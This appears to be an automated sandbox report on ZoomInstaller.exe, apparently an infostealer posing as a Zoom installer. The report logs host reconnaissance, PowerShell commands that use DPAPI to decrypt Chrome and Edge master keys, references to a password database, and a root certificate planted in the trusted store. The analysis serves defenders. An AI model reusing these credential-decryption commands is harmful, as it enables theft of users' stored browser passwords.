    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00015D000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1944543316.000002976C7FB000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1944783848.000002976C7FB000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1944945030.000002976C7FB000.00000004.00000020.00020000.00000000.sdmp, passwords.db.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
    Source: ZoomInstaller.exe String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
    Source: ZoomInstaller.exe String found in binary or memory: -stopTimer
    Source: ZoomInstaller.exe String found in binary or memory: -addr
    Source: ZoomInstaller.exe String found in binary or memory: -stop
    Source: unknown Process created: C:\Users\user\Desktop\ZoomInstaller.exe "C:\Users\user\Desktop\ZoomInstaller.exe"
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_videocontroller get caption
    Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\tasklist.exe tasklist
    Source: C:\Windows\System32\tasklist.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
    Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Version
    Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\tasklist.exe tasklist
    Source: C:\Windows\System32\tasklist.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: powrprof.dll
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: umpdc.dll
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: dhcpcsvc6.dll
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: dhcpcsvc.dll
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: gpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
    Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: ZoomInstaller.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: ZoomInstaller.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: ZoomInstaller.exeStatic file information: File size 22207488 > 1048576
    Source: ZoomInstaller.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3e6000
    Source: ZoomInstaller.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x30f000
    Source: ZoomInstaller.exeStatic PE information: Raw size of /19 is bigger than: 0x100000 < 0x4e8c00
    Source: ZoomInstaller.exeStatic PE information: Raw size of /45 is bigger than: 0x100000 < 0x203200
    Source: ZoomInstaller.exeStatic PE information: Raw size of /81 is bigger than: 0x100000 < 0x38fe00
    Source: ZoomInstaller.exeStatic PE information: Raw size of /92 is bigger than: 0x100000 < 0x112200
    Source: ZoomInstaller.exeStatic PE information: Raw size of /141 is bigger than: 0x100000 < 0x17ec00
    Source: ZoomInstaller.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: ZoomInstaller.exeStatic PE information: section name: .xdata
    Source: ZoomInstaller.exeStatic PE information: section name: /4
    Source: ZoomInstaller.exeStatic PE information: section name: /19
    Source: ZoomInstaller.exeStatic PE information: section name: /31
    Source: ZoomInstaller.exeStatic PE information: section name: /45
    Source: ZoomInstaller.exeStatic PE information: section name: /57
    Source: ZoomInstaller.exeStatic PE information: section name: /70
    Source: ZoomInstaller.exeStatic PE information: section name: /81
    Source: ZoomInstaller.exeStatic PE information: section name: /92
    Source: ZoomInstaller.exeStatic PE information: section name: /106
    Source: ZoomInstaller.exeStatic PE information: section name: /125
    Source: ZoomInstaller.exeStatic PE information: section name: /141
    Source: ZoomInstaller.exeStatic PE information: section name: /157
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9BAD1D9F push esp; iretd 17_2_00007FFD9BAD2043

    Persistence and Installation Behavior

    Source: C:\Users\user\Desktop\ZoomInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
